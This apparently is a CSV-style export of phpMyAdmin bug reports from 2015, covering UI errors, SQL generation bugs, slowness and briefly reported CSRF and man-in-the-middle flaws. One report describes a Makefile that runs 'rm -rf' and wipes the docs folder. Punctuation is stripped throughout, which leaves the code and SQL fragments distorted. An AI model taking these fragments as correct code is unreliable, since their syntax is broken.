jQuery v1.11.1 | c) 2005, 2014 jQuery Foundation, Inc. | jquery.org li ... , !function a,b){\ object\ ==typeof module \ object\ ==typeof module.exports?mod ... , if k j[k] e||j[k].data)||void 0!==d||\ string\ !=typeof b)return k|| k=i?a ... , },cur function ){var a=Zb.propHooks[this.prop];return a a.get?a.get this) ... , ; , , function sprintf ) { , ], filename jquery jquery 1.11.1.min.js }, { func Object.AJAX.fireTeardown , line 127, column 21 , context [ , return void , , fireTeardown function file) { , var eventName = teardown AJAX.hash file); , document).triggerHandler eventName); , if this.
debug) { , console.log , no need to translate , \ Fired event \ eventName \ for file \ file , ); ], filename ajax.js }, { func Object.AJAX.scriptHandler.reset , line 576, column 22 , context [ , return void , , reset function callback) { , for var i in this.
scriptsToBeFired) { , AJAX.fireTeardown this.
scriptsToBeFired[i]); , } , this.
scriptsToBeFired = []; , , Re attach a generic event handler to clicks , on pages and submissions of forms ], filename ajax.js }, { func Object.AJAX.responseHandler [as success] , line 318, column 32 , context [ AJAX.active = false; , AJAX.xhr = null; , return; , } , , AJAX.scriptHandler.reset function ) { , if data.
reloadNavigation) { , PMA reloadNavigation ); , } , if data.
title) { , title ).replaceWith data.
title); ], filename ajax.js } ], useragent Mozilla 5.0 Macintosh; Intel Mac OS X 10 10 3) AppleWebKit 537.36 KHTML, like Gecko) Chrome 41.0.2272.76 Safari 537.36 , incomplete false , partial true , uri tbl structure.php?target= }, script name tbl structure.php , microhistory { pages [ { hash index.php?db= table= server=1 target= token=0842f19c37dc9a320fc6b7caacb88926 }, { hash db structure.php?db=webqc table= server=1 target= token=0842f19c37dc9a320fc6b7caacb88926 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext P , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } }, { hash index.php?db= table= server=1 target= token=0842f19c37dc9a320fc6b7caacb88926 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext P , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } }, { hash tbl create.php?db=webqc table= server=1 target= token=0842f19c37dc9a320fc6b7caacb88926 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext P , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } }, { hash db structure.php?db=webqc table= server=1 target= token=0842f19c37dc9a320fc6b7caacb88926 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext P , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } }, { hash tbl structure.php?db=webqc table=test server=1 target= token=0842f19c37dc9a320fc6b7caacb88926 , params { opendb url db structure.php , safari browser 0 , collation connection utf8mb4 unicode ci , lang en , server 1 , text dir ltr , show databases navigation as tree true , pma text default tab Browse , pma text left default tab Structure , pma text left default tab2 false , LimitChars 50 , pftext P , confirm true , LoginCookieValidity 1440 , logged in true , auth type config } } ], current index 6 } } >> Original URL https sourceforge.net p phpmyadmin bugs 4855 Original author vchn Found in version 4.4.2 Attachment http sourceforge.net p phpmyadmin bugs 4855 attachment Screen 20Shot 202015 04 15 20at 2010.36.48 20AM.png","bug"
"24444","11213","Error with PMA DisplayResults >getTable ).
So I added new column in a table, then went to browse that table, and now I get like 1000 different errors.
I traced them all back to a common point, which was a call to PMA DisplayResults >getTable ).
Removing the new column also removed the errors, while adding the column back reintroduced the errors.
The new column was pretty simple ALTER TABLE `table` ADD `name short` TINYTEXT NULL DEFAULT NULL AFTER `name` Here s my table with the column already added.
Somewhat anonymized.
CREATE TABLE IF NOT EXISTS `table` `id` int 4) unsigned NOT NULL, `name` tinytext NOT NULL, `name short` tinytext, `type` enum 1 , 2 , 3 , ) NOT NULL, `a` decimal 12,4) NOT NULL, `b` decimal 12,4) DEFAULT NULL, `c` decimal 12,4) DEFAULT NULL, `d` decimal 12,4) DEFAULT NULL, `e` enum 1 , 2 , 3 , 4 ) NOT NULL DEFAULT 1 ) ENGINE=InnoDB DEFAULT CHARSET=latin1; And here s what the function call data looked like.
Again somewhat anonymized.
PMA DisplayResults >getTable dt result = {mysqli result} [5] current field = 0 field count = 9 lengths = null num rows = 25 type = 0 the disp mode = urdr111101 , analyzed sql = {array} [1] 0 = {array} [18] querytype = SELECT select expr clause = position of first select = 0 from clause = `table` group by clause = order by clause = having clause = limit clause = where clause = where clause identifiers = {array} [0] unsorted query = SELECT FROM xe2x80x98table` queryflags = {array} [1] select from = 1 select expr = {array} [0] table ref = {array} [1] 0 = {array} [5] expr = table db = table name = table table alias = table true name = table foreign keys = {array} [0] create table fields = {array} [0] section before limit = SELECT FROM `table` section after limit = , is limited display = false ) Original URL https sourceforge.net p phpmyadmin bugs 4856 Original author harpercl Found in version 4.4.2","bug"
"24444","11214","Alter table after changing column name error.
Step to reprocedure 1 choose a table, view structure, pick a column and click Change to alter this column 2 Just change column name click save 3 We are backed to table structure page, now we want to add new 3 column for example, enter 3 columns from at beginning of table click go 4 Enter 3 new column, type int, NULL default value end allow NULL will automatically checked) 5 Save got error.
PS captured error from http demo.phpmyadmin.net QA 4 4 Original URL https sourceforge.net p phpmyadmin bugs 4857 Original author vchn Found in version 4.4.2 Attachment http sourceforge.net p phpmyadmin bugs 4857 attachment Screen 20Shot 202015 04 16 20at 201.36.08 20PM.png Attachment http sourceforge.net p phpmyadmin bugs 4857 attachment Screen 20Shot 202015 04 16 20at 201.42.59 20PM.png","bug"
"24444","11215","issues with SQL autocomplete.
I use the SQL query editor quite often.
The SQL autocomplete is a nice feature.
However, it seems to be quite slow.
I attached a screenshot from Firefox developer view.
It seems as if HTTP requests are fired very often and only shortly one after another.
I hit submit query and it takes ages for the query to return.
Once it returns, it says that the query only took about 0.03 seconds, even though I had to wait for about a minute or so.
I have many databases and tables.
Maybe querying INFORMATION SCHEME is just slow?
My only idea to circumvent the problem is to not stack autocomplete requests.
That is, only fire a request if there is non currently in the works .
This maybe would make the autocomplete feel less responsive , but at least it would make the overall experience much more responsive .
Original URL https sourceforge.net p phpmyadmin bugs 4858 Original author ci dev Found in version 4.4.2 Attachment http sourceforge.net p phpmyadmin bugs 4858 attachment pma autocomplete.png","bug"
"24444","11216","Don t scroll to bottom) when editing multiple rows.
When editing multiple rows it scrolls to the bottom, it shouldn t do this.
Original URL https sourceforge.net p phpmyadmin bugs 4859 Original author olafvdspek Found in version 4.4.3","bug"
"24444","11217","Overhead shown as 6,016.8KiB.
6,016.8KiB should be 5.88MiB or so), I thought this was fixed before.
Original URL https sourceforge.net p phpmyadmin bugs 4860 Original author olafvdspek Found in version 4.4.2","bug"
"24444","11218","Use of undefined constant PMA DRIZZLE assumed PMA DRIZZLE .
Notice in .
libraries DatabaseInterface.class.php 1344 Use of undefined constant PMA DRIZZLE assumed PMA DRIZZLE Original URL https sourceforge.net p phpmyadmin bugs 4861 Original author olafvdspek Found in version 4.4.3","bug"
"24444","11219","Edit vs Change.
Sometimes it s called Edit, sometimes it s called Change.
Time for some consistency.
;) Original URL https sourceforge.net p phpmyadmin bugs 4863 Original author olafvdspek Found in version 4.4.3","bug"
"24444","11220","Tried to set secure cookie on non secure connection.
GET pma navigation.php?
.. HTTP 1.1 200 OK Cache Control no store, no cache, must revalidate, post check=0, pre check=0, max age=0 .. X Powered By PHP 5.4.39 0 deb7u2 Last Modified Mon, 20 Apr 2015 11 51 18 GMT Set Cookie phpMyAdmin= ; path= pma ; secure; HttpOnly Original URL https sourceforge.net p phpmyadmin bugs 4864 Original author olafvdspek Found in version 4.4.3","bug"
"24444","11221","sprintf ) Too few arguments.
Trying to create a table named xc3xa9cole .
Original URL https sourceforge.net p phpmyadmin bugs 4865 Original author lem9 Found in version 4.4.3","bug"
"24444","11222","Limit column ordering in index edit dialog.
Original URL https sourceforge.net p phpmyadmin bugs 4866 Original author madhuracj Found in version 4.4.0","bug"
"24444","11223","Incorrect ALTER TABLE statement generated.
Scenario 1.
Create a table with 2 columns 2.
Display its structure 3.
For the second column, use the Drop action and confirm 4.
In the Add 1 column s) dialog, click on Go 5.
Enter the new column name and click on Save Original URL https sourceforge.net p phpmyadmin bugs 4867 Original author lem9 Found in version 4.4.3","bug"
"24444","11224","drop column action not asking to confirm.
1.
Go to table structure page.
2. change a column, by clicking inline link change .
3. save the change 4. click drop to drop a column, it drops the column without confirming.
Original URL https sourceforge.net p phpmyadmin bugs 4869 Original author smita786 Found in version 4.4.3","bug"
"24444","11225","Error on creating table.
Enter phpmyadmin root url, choose a database, click new to add new table On that screen, add 4 rows as in screenshot Plus one more column by click Add s) 1 GO on the top Enter as timestamp for example Save GOT error message.
In this case, to process, need to change first column back to value, then change back to PRIMARY confirm add key again, we now can save create table.
Original URL https sourceforge.net p phpmyadmin bugs 4871 Original author vchn Found in version 4.4.3 Attachment http sourceforge.net p phpmyadmin bugs 4871 attachment Screen 20Shot 202015 04 24 20at 208.36.54 20AM.png","bug"
"24444","11226","Drop table doesn t remove the table name from navigation bar.
I used DROP table [tablename] and the table name still appears in the navigation bar to the left.But I get an error when I click on it saying Table doesn t exist .
Original URL https sourceforge.net p phpmyadmin bugs 4872 Original author shrividhya Found in version 4.4.0 Attachment http sourceforge.net p phpmyadmin bugs 4872 attachment demo.png","bug"
"24444","11227","2x Too many sorts are causing temporary tables.. Advisor lists this issue twice.
Original URL https sourceforge.net p phpmyadmin bugs 4873 Original author olafvdspek Found in version 4.4.3","bug"
"24444","11228","Username like john smith is splitted to two names in dropdown list.
When having user name like v koreck the dropdown list shows it as v , then expands to koreck .
Please see attachment.
Original URL https sourceforge.net p phpmyadmin bugs 4874 Original author marek270409 Found in version 4.4.2 Attachment http sourceforge.net p phpmyadmin bugs 4874 attachment blad phpmyadmin.jpg","bug"
"24444","11229","Better Docs.
> A value of true activates the navi pointer.
What s a navi pointer?
> Whether to activate the browse pointer or not.
Browse pointer?
> Whether to activate the browse marker or not.
Marker?
Original URL https sourceforge.net p phpmyadmin bugs 4875 Original author olafvdspek Found in version 4.4.4","bug"
"24444","11230","Settings issues.
Favorite tables settig in both in Features and in Nav panel.
> Group items in the navigation tree determined by the separator defined below).
Below?
I guess this refers to either the DB tab or the table tab..
Which one is it?
How do I enable DB expansion but disable table expansion?
Original URL https sourceforge.net p phpmyadmin bugs 4876 Original author olafvdspek Found in version 4.4.4","bug"
"24444","11231","auto redirect to login page after timeout.
This should not happen and is really anoying!
If you have many windows with queries and doing some implementation not all windows have regular reloads.
Keep the page open you might show a hint that this session ended but please only a small hint.
Original URL https sourceforge.net p phpmyadmin bugs 4877 Original author mokraemer Found in version 4.4.4","bug"
"24444","11232","Column list of central columns is not cleared.
When adding columns to the list of central columns, choosing a different table from the table dropdown does not clear the list of columns of the previous table from the columns dropdown.
Original URL https sourceforge.net p phpmyadmin bugs 4878 Original author madhuracj Found in version 4.4.0","bug"
"24444","11233","Designer icons missing when using original theme.
Original URL https sourceforge.net p phpmyadmin bugs 4880 Original author madhuracj Found in version 4.4.0","bug"
"24444","11234","Demo not working.
Not loading at all Original URL https sourceforge.net p phpmyadmin bugs 4882 Original author olafvdspek Found in version 4.4.4 Attachment http sourceforge.net p phpmyadmin bugs 4882 attachment pma.PNG","bug"
"24444","11235","Search function breaks when searching for vertain combinations of backslashes and slashes.
It seems that from version 4.2.4.1 to present, there is an inability to search all tables of a database for values containing backslash escaped forward slashes.
For example, I searched for wp\ , and was given a red error popup telling me that a 500 Internal Server Error had occurred.
This issue is making it difficult to find and update old paths in test instances of WordPress in preparation for making them go live, as some WordPress features store JSON data, escaped slashes and all.
My workaround at the moment has been full export and reimports of the database after making manual corrections in my text editor.
Original URL https sourceforge.net p phpmyadmin bugs 4883 Original author mjnorthcott Found in version 4.2.6 Attachment http sourceforge.net p phpmyadmin bugs 4883 attachment pma error search.png","bug"
"24444","11236","docs folder make clean removes all doc files.
Running `make clean` from inside the docs folder wipes out all files in `.
docs ` due to running `rm rf `.
This is probably a bad idea.
Original URL https sourceforge.net p phpmyadmin bugs 4884 Original author ibennetch Found in version 3.5.1","bug"
"24444","11237","Some icons are above the overlay of jQuery dialogs.
These include, in QA 4 4, goto pagetop and lock page icon in master, add more columns panel in table create alter page Original URL https sourceforge.net p phpmyadmin bugs 4885 Original author madhuracj Found in version 4.4.0","bug"
"24444","11238","Problems exporting data.
When trying to export databases using server export.php, I get the following error message PHP Fatal error Allowed memory size of 134217728 bytes exhausted tried to allocate 84 bytes) in usr share phpmyadmin libraries dbi DBIMysqli.class.php on line 295 System config PMA 4.4.4 PHP 5.5.9 1ubuntu4.9 mysql Ver 15.1 Distrib 10.0.17 MariaDB Ubuntu Server 14.04 LTS Original URL https sourceforge.net p phpmyadmin bugs 4889 Original author sharpless78 Found in version 4.4.4","bug"
"24444","11239","window.webkitStorageInfo webkitIndexedDB is deprecated.
Hi, I get this two error messages in the console.
1. window.webkitStorageInfo is deprecated.
Please use navigator.webkitTemporaryStorage or navigator.webkitPersistentStorage instead.
2. webkitIndexedDB is deprecated.
Please use indexedDB instead.
May be it is caused by jquery ver 1.11.1.
I suggest you to upgrade the latest version of 1.11.3 or take other necessary steps.
Thanks Browser Google Chrome 42.0.2311.135 m 64 bit) Platform Win 8.1 64bit phpMyAdmin ver 4.4.5 Apache 2.4.12 Win32) PHP 5.6.8 MySQL 5.6.24 Original URL https sourceforge.net p phpmyadmin bugs 4890 Original author shakil1 Found in version 4.4.5","bug"
"24444","11240","CSV Import ignores Replace table data with file checkbox.
As reported at http stackoverflow.com questions 29947195 phpmyadmin csv upload replace data not working Selecting the checkbox does not replace the table data with the data in the import file; it only adds the file s contents to the existing data.
Original URL https sourceforge.net p phpmyadmin bugs 4891 Original author ibennetch Found in version 3.5.1","bug"
"24444","11241","Undefined variable unique conditions.
Following warning was seen while running an Explain query.
Notice in .\libraries\DisplayResults.class.php 3012 Undefined variable unique conditions Backtrace .\libraries\DisplayResults.class.php 2708 PMA DisplayResults > getRowValues object, array, integer 0, boolean false, array, string , boolean false, string .`id` = 1 AND .`select type` = \ SIMPLE\ AND .`table` = \ countrylanguage\ AND .`type` = \ ALL\ AND .`possible keys` IS NULL AND .`key` IS NULL AND .`key len` IS NULL AND .`ref` IS NULL AND .`rows` = 984 AND .`Extra` IS NULL , string EXPLAIN SELECT FROM `countrylanguage` , array, ) .\libraries\DisplayResults.class.php 4265 PMA DisplayResults > getTableBody object, array, array, array, boolean false, ) .\libraries\sql.lib.php 1769 PMA DisplayResults >getTable object, array, array, ) .\libraries\sql.lib.php 2049 PMA getHtmlForSqlQueryResultsTable object, string .
themes pmahomme img , NULL, array, boolean false, integer 1, integer 1, NULL, object, array, ) .\libraries\sql.lib.php 2245 PMA getQueryResponseForResultsReturned object, array, string world , string countrylanguage , NULL, NULL, object, string .
themes pmahomme img , integer 1, integer 1, string EXPLAIN SELECT FROM `countrylanguage` , NULL, NULL, NULL, NULL, NULL, string EXPLAIN SELECT FROM `countrylanguage` , NULL, ) .\import.php 725 PMA executeQueryAndGetQueryResponse array, boolean false, string world , string countrylanguage , NULL, string EXPLAIN SELECT FROM `countrylanguage` , NULL, boolean false, NULL, NULL, NULL, string tbl structure.php , string .
themes pmahomme img , NULL, NULL, NULL, string EXPLAIN SELECT FROM `countrylanguage` , NULL, NULL, ) Original URL https sourceforge.net p phpmyadmin bugs 4892 Original author madhuracj Found in version 4.4.5","bug"
"24444","11242","Nav tree line alignment issue.
If you zoom in you ll see that each item has an additional vertical line.
Original URL https sourceforge.net p phpmyadmin bugs 4893 Original author olafvdspek Found in version 4.4.5 Attachment http sourceforge.net p phpmyadmin bugs 4893 attachment pma.PNG","bug"
"24444","11243","Deleting without confirmation.
Hi, I found bug with deleting records without confirmation.
It is not very good, because user can delete record by mistake or misclick.
Steps to reproduce 1.
Open table; 2.
Press next page button; 3.
Press delete record button.
Original URL https sourceforge.net p phpmyadmin bugs 4894 Original author jay04653 Found in version 4.4.5","bug"
"24444","11244","Distinct values is broken.
Distinct values is broken even on demo) Original URL https sourceforge.net p phpmyadmin bugs 4895 Original author olafvdspek Found in version 4.4.5 Attachment http sourceforge.net p phpmyadmin bugs 4895 attachment oops.PNG","bug"
"24444","11245","Non styled error page when following results link.
I can get a non stylized error page by going to any SQL tab from the main page, any database, or any table) and running a query like `select encrypt foo );` then clicking the link 38794c423761353145642f3663) in the results.
Original URL https sourceforge.net p phpmyadmin bugs 4896 Original author ibennetch Found in version 4.4.0","bug"
"24444","11246","Column hint in SQL autocomplete is sometimes not shown.
When using SQL editor and the Console both, the hints datatype, keys etc.)
for columns are not shown in whichever you use later.
Original URL https sourceforge.net p phpmyadmin bugs 4897 Original author nisargjhaveri Found in version 4.4.6","bug"
"24444","11247","CSRF in setup.
As reported by Inti De Ceukelaire, it is possible to perform a CSRF attack on setup due to the lack of CSRF token in a url Original URL https sourceforge.net p phpmyadmin bugs 4899 Original author madhuracj Found in version 4.4.0","bug"
"24444","11248","Man In the Middle Github API.
As reported by Maksymilian Arciemowicz, it is possible to perform a man in the middle attack on the request that fetches git revision information from Github Original URL https sourceforge.net p phpmyadmin bugs 4900 Original author madhuracj Found in version 4.4.0","bug"
"24444","11249","Import status infinite loop.
BUG 4367 Import status infinite loop is still uncompleted https sourceforge.net p phpmyadmin bugs 4367 Bug in script import status.php at line 80 wait until message is available while SESSION[ Import message ][ message ] == null) { usleep 250000); 0.25 sec } This create a neverending loop, becouse session isn t accessible by another process.
So the solution is close and reopen sessions like this wait until message is available counter = 0; while SESSION[ Import message ][ message ] == null) { a ; session write close ); usleep 1000000); 1.00 sec session start ); if counter>20) { SESSION[ Import message ][ message ] = TIMEOUT ; Break; } } Original URL https sourceforge.net p phpmyadmin bugs 4903 Original author sopak Found in version Latest Git","bug"
"24444","11250","Setup Overview > Display does not work.
This worked in 3.5.8.2.
Based on the current QA 4 4, I believe that there are two causes for this 1. some scripts under setup looking at GET instead of POST 2. using header Location... ) under setup which is missing the token, therefore clearing the page parameter Original URL https sourceforge.net p phpmyadmin bugs 4904 Original author lem9 Found in version 4.4.6","bug"
"24444","11251","Sorting by an alias.
For example, with the employees sample database SELECT dept name AS myalias FROM departments and click to sort on myalias Bug introduced by https github.com phpmyadmin phpmyadmin commit a05ab9640bf44b86334f522fbc634cb64444d976 Original URL https sourceforge.net p phpmyadmin bugs 4905 Original author lem9 Found in version 4.4.6","bug"
"24444","11252","Designer pages from all databases.
When phpMyAdmin configuration storage is not configured and browser s indexDB is used to store designer pages and coordinates, trying to open a page shows pages from all the dbs.
Moreover, this gives an error when you go to the designer of a database whose not the database of the first saved page in indexDB Original URL https sourceforge.net p phpmyadmin bugs 4906 Original author madhuracj Found in version 4.4.0","bug"
"24444","11253","Wrong textual description of the enum and set data types.
ENUM and SET mysql type) title description is not correct at least the german version WRONG ENUM TITLE Eine Aufzxc3xa4hlung, gewxc3xa4hlt aus der Liste von bis zu 65.535 Werten oder dem besonderen Fehler Wert CORRECT ENUM TITLE Ein einzelner Wert, gewxc3xa4hlt aus der Liste von bis zu 65.535 Werten oder dem besonderen Fehler Wert WRONG SET TITLE Ein einzelner Wert gewxc3xa4hlt aus einem Satz von bis zu 64 Eintrxc3xa4gen CORRECT SET TITLE Eine Aufzxc3xa4hlung, gewxc3xa4hlt aus einem Satz von bis zu 64 Eintrxc3xa4gen Original URL https sourceforge.net p phpmyadmin bugs 4907 Original author lsblsb Found in version 3.5.1","bug"
"24444","11254","Reverse proxy infinite internal redirect.
phpMyAdmin 4.4.7 gets stuck in an infinite internal redirect and will not load whatsoever.
I have the same results in IE and Firefox using Windows 7 64 bit.
Here are the access logs nothing shows in the error logs) 22.33.44.55 [17 May 2015 09 17 53 0700] GET phpmyadmin ?SID= SID HTTP 1.0 302 Mozilla 5.0 Windows NT 6.1; WOW64; Trident 7.0; rv 11.0) like Gecko 22.33.44.55 [17 May 2015 09 17 53 0700] GET phpmyadmin ?SID= SID HTTP 1.0 302 Mozilla 5.0 Windows NT 6.1; WOW64; Trident 7.0; rv 11.0) like Gecko 22.33.44.55 [17 May 2015 09 17 53 0700] GET phpmyadmin ?SID= SID HTTP 1.0 302 Mozilla 5.0 Windows NT 6.1; WOW64; Trident 7.0; rv 11.0) like Gecko 22.33.44.55 [17 May 2015 09 17 53 0700] GET phpmyadmin ?SID= SID HTTP 1.0 302 Mozilla 5.0 Windows NT 6.1; WOW64; Trident 7.0; rv 11.0) like Gecko 22.33.44.55 [17 May 2015 09 17 53 0700] GET phpmyadmin ?SID= SID HTTP 1.0 302 Mozilla 5.0 Windows NT 6.1; WOW64; Trident 7.0; rv 11.0) like Gecko 22.33.44.55 [17 May 2015 09 17 53 0700] GET phpmyadmin ?SID= SID HTTP 1.0 302 Mozilla 5.0 Windows NT 6.1; WOW64; Trident 7.0; rv 11.0) like Gecko 22.33.44.55 [17 May 2015 09 17 53 0700] GET phpmyadmin ?SID= SID HTTP 1.0 302 Mozilla 5.0 Windows NT 6.1; WOW64; Trident 7.0; rv 11.0) like Gecko Original URL https sourceforge.net p phpmyadmin bugs 4908 Original author mayhem30 Found in version 4.4.7","bug"
"24444","11255","Central column with multiple server.
When I opened phpMyAdmin without selected server and after selecting server, I got following error for central column The description for Event ID 2 from source PHP 5.5.1 cannot be found.
Either the component that raises this event is not installed on your local computer or the installation is corrupted.
You can install or repair the component on the local computer.
If the event originated on another computer, the display information had to be saved with the event.
The following information was included with the event php[1584] PHP Fatal error Call to a member function selectDb ) on a non object in C \Program Files\Apache Software Foundation\Apache24\htdocs\phpMyAdmin\libraries\central columns.lib.php on line 706 Original URL https sourceforge.net p phpmyadmin bugs 4909 Original author janveres Found in version 4.4.7 Attachment http sourceforge.net p phpmyadmin bugs 4909 attachment Picture1.JPG","bug"
"24444","11256","Insane slow.
Hi!
The problem I have pinpointed is the access to the information schema.routines when you have , like me 1000 databases en 35000 routines declared.
What to do?
This query takes forever SELECT COUNT ) FROM `INFORMATION SCHEMA`.`ROUTINES` WHERE `ROUTINE SCHEMA` COLLATE utf8 bin= ...
Thanks for the development of such a great tool.
Mauricio Ramirez Original URL https sourceforge.net p phpmyadmin bugs 4910 Original author moricio Found in version 4.4.7","bug"
"24444","11257","Highlight pointer and Row marker doesn t work properly.
Irrespective of Settings > Main panel > Browse mode > Row marker option, while browsing table, row is always marked when selected with the checkbox at beginning of the row.
Similarly irrespective of Highlight pointer option row under mouse pointer is always highlighted.
However, this option affects column highlighting as expected.
Original URL https sourceforge.net p phpmyadmin bugs 4912 Original author nisargjhaveri Found in version 4.4.7","bug"
"24444","11258","GROUP CONCAT is as GROUPBY CONCAT in the autocomplete in SQL Query editor.
When I try to write ``GROUP CONCAT`` command in the SQL query editor, the autocomplete mechanism, completes to ``GROUPBY CONCAT`` instead.
See attached screenshot for details Original URL https sourceforge.net p phpmyadmin bugs 4913 Original author ypanagis Found in version 4.4.7 Attachment http sourceforge.net p phpmyadmin bugs 4913 attachment groupby.PNG","bug"
"24444","11259","Navigation pane highlighting issue when in database view.
In the navigation pane, hovering over an item highlights it.
Navigating to a table highlights the table to show that it s the active item, this works as expected.
Navigating to a database while the main pane is in the database view) highlights all tables in that database as well as the database itself.
I think it should only highlight the database.
Original URL https sourceforge.net p phpmyadmin bugs 4914 Original author ibennetch Found in version 4.4.7 Attachment http sourceforge.net p phpmyadmin bugs 4914 attachment Screen 20Shot 202015 05 20 20at 2012.32.03 20AM.png","bug"
"24444","11260","cfg[ Export method ] = custom no form not respected.
I ve set cfg[ Export method ] = custom no form but it still shows me the form.
Original URL https sourceforge.net p phpmyadmin bugs 4915 Original author olafvdspek Found in version Latest Git","bug"
"24444","11261","Autocomplete either doesn t function at all or auto completes the original table name when joining multiple aliased tables.
Suppose we have 3 tables table1, table2, table3 Whenever I write query of the form select t1.
, t2.field1, t3.
from table1 as t1 inner join table2 as t2 on t1.id = t2.id 1st join condition inner join table3 as t3 on t2.fk = t3.id 2nd join condition then when I am in the process of typing the 2nd join condition, the autocomplete engine recognizes the list of t3 fields but when I select one of them it brings the full unaliased) name of the table, i.e ``table3``.
For the 1st condition, autocomplete simply doesn t work Original URL https sourceforge.net p phpmyadmin bugs 4916 Original author ypanagis Found in version 4.4.7","bug"
"24444","11262","Changing time with datetime picker gives JS error.
Original URL https sourceforge.net p phpmyadmin bugs 4917 Original author madhuracj Found in version Latest Git","bug"
"24444","11263","Print View of Table Browse generates additional output.
Hi, The Print View of Table Browse generates required output but also includes the Browse Mode Tab of Settings > Main Panel .
The Screenshots of output from STABLE and MASTER at Demo server are included.
At the first thought, I think this is related to the implementation of RFE 1559 but I may be wrong.
Screenshots attached.
Original URL https sourceforge.net p phpmyadmin bugs 4919 Original author deven bansod Found in version Latest Git Attachment http sourceforge.net p phpmyadmin bugs 4919 attachment master Git.png Attachment http sourceforge.net p phpmyadmin bugs 4919 attachment Stable.png","bug"
"24444","11264","relation view doesn t list fields of table in other database.
I tested in my own 4.4.7 and on the demo server http demo.phpmyadmin.net QA 4 4 ).
Please set up databases test1 and test2 according to the attached dump.
Navigate to table test2 .
test2 .
Try to set up a relation for field test1 id to database test1 , table test1 .
I can select database test1 .
The list of tables gets updated.
If I select table test1 , the list of fields there does NOT get updated and stays empty.
Original URL https sourceforge.net p phpmyadmin bugs 4920 Original author ci dev Found in version 4.4.7 Attachment http sourceforge.net p phpmyadmin bugs 4920 attachment 192 168 30 23.sql","bug"
"24444","11265","Textarea rows settings ignored Features > Text fields.
Both the options for Textarea rows in Settings > Features > Text fields are overridden by CSS, and have no effect.
Original URL https sourceforge.net p phpmyadmin bugs 4921 Original author nisargjhaveri Found in version 4.4.7","bug"
"24444","11266","Sort by key drop down value is lost.
Due to a mixup with sort expression, the sort order chosen with this drop down does not stick.
Original URL https sourceforge.net p phpmyadmin bugs 4922 Original author lem9 Found in version 4.4.7","bug"
"24444","11267","Limits table comments to 60 characters.
In the options pane of table operations, table comments can be set.
Unfortunately, their length is limited to 60 characters via maxlength.
This was the length limit prior to MySQL 5.5.3, but newer servers support 2048 characters, which is extremely useful.
MySQL Workbench allows making use of the server s actual limit.
See https docs.oracle.com cd E17952 01 workbench relnotes en wb news 5 2 37.html for reference.
By the way, something is wrong with your tracker s Milestone field sets to 3.5.1 by default).
Original URL https sourceforge.net p phpmyadmin bugs 4923 Original author chealer Found in version 4.4.6","bug"
"24444","11268","recaptcha API2 and php 5.6 failure.
issue may be specific to php 5.6 installs?
logins fail, captcha errors out as Warning in .
libraries plugins auth recaptcha recaptchalib.php 94 file get contents ) SSL operation failed with code 1.
OpenSSL Error messages error 14090086 SSL routines SSL3 GET SERVER CERTIFICATE certificate verify failed Backtrace .
libraries plugins auth recaptcha recaptchalib.php 94 file get contents string https www.google.com recaptcha api siteverify?secret........ .
libraries plugins auth recaptcha recaptchalib.php 125 ReCaptcha > submitHTTPGet string https www.google.com recaptcha api siteverify?
, array, ) Warning in .
libraries plugins auth recaptcha recaptchalib.php 94 file get contents ) Failed to enable crypto Backtrace .
libraries plugins auth recaptcha recaptchalib.php 94 file get contents string https www.google.com recaptcha api siteverify?
Original URL https sourceforge.net p phpmyadmin bugs 4924 Original author noelb Found in version 4.4.7","bug"
"24444","11269","Multi table Empty Drop doesn t work.
Go to DB structure page, select one or more tables, select Empty or Drop from select box below.
It give a blank page with no effect on tables, also without any confirmation.
Original URL https sourceforge.net p phpmyadmin bugs 4925 Original author nisargjhaveri Found in version Latest Git","bug"
"24444","11270","Browsing tables chokes on 30k tables in DB.
I have 30k tables in a database.
If I click on a DB in left navigation tree, a spinner appears and takes minutes to load the paginated interface for selecting a table in the DB.
Original URL https sourceforge.net p phpmyadmin bugs 4926 Original author ericandrewlewis Found in version 4.4.7","bug"
"24444","11271","testing error reporting server!.
ignore!
This report is related to user submitted report [ 201] http localhost 8080 error reporting server reports view 201) on the phpmyadmin error reporting server.
Original URL https sourceforge.net p phpmyadmin bugs 4928 Original author smita786 Found in version 4.1.0","bug"
"24444","11272","Edit view structure doesn t load the algorithm.
When a view defined an algorithm, if you go to structure and click on link to manage the view, the form won t select the defined algorithm.
Original URL https sourceforge.net p phpmyadmin bugs 4929 Original author tithugues Found in version 4.4.7","bug"
"24444","11273","Database copy doesn t work for tables with more than one FULLTEXT index.
A database cannot be copied by Operations > Copy database to , if a table has more than one FULLTEXT indexes.
Here is an example CREATE TABLE `pages` `name` varchar 64) DEFAULT NULL, `title` varchar 64) DEFAULT NULL, FULLTEXT KEY `name` `name`), FULLTEXT KEY `title` `title`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 If I try to copy the database with this table, I get the following error !
[SQL error] https cdn.pbrd.co images LZJmNZs.jpg) The problem exists for both MyISAM and InnoDB tables, and seems to be introduced by the following new feature http sourceforge.net p phpmyadmin feature requests 1553 The two FULLTEXT indexes are exported by phpMyAdmin as two SQL statements but the import operation tries to execute both SQL statements as one SQL statement, and hence the SQL error.
Platform PHP 5.5.23 MySQL 5.6.24 percona.
Original URL https sourceforge.net p phpmyadmin bugs 4930 Original author famzah Found in version 4.4.6","bug"
"24444","11274","False error before entering reCAPTCHA.
When i open phpMyAdmin, this error is immediately displayed without doing anything Please enter correct captcha!
Problem persists also after flushing the cookies.
Firefox 38.0, 64bit Kubuntu.
Expected behavior Error about invalid captcha should only be displayed after user fails doing captcha.
